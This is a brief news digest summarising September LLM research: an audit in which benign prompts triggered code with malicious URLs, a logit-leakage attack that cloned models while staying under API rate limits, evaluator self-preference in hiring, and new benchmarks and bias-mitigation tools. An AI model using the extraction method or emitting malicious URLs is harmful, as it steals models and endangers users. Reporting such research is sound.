Particle News: September Research Blitz Reveals LLM Vulnerabilities and Rolls Out Real-World Benchmarks

Overview

A scalable audit of GPT-4o, GPT-4o-mini, Llama-4-Scout and DeepSeek-V3 found an average 4.2% of generated programs contained malicious URLs, with 177 benign prompts reliably triggering harmful code across all models.
A logit‑leakage attack reconstructed output projections from fewer than 10,000 top‑k queries and distilled functional clones in under 24 GPU hours without tripping API rate limits.
A large controlled hiring study found strong self‑preferencing: LLM evaluators favored resumes written by the same model, boosting shortlisting odds by 23%–60% over equally qualified human‑written resumes, with simple interventions halving the bias.
New evaluation resources span deep research synthesis (InfoSeek), verifier‑reward reasoning datasets and generators (LoongBench/LoongEnv), Arabic and Islamic cultural competence (PalmX), Korean legal multi‑hop QA (KoBLEX), and rubric‑driven clinical behavior assessment (HealthBench).
Mitigation and efficiency tools reported concrete gains, including constitution‑aware decoding that reduced Indian caste and religion bias by up to 26.41% (AMBEDKAR), a cost‑guaranteed model cascade cutting spend by up to 86% (BARGAIN), and an attribution method auditing RAG reliance with over 95% accuracy (LEA).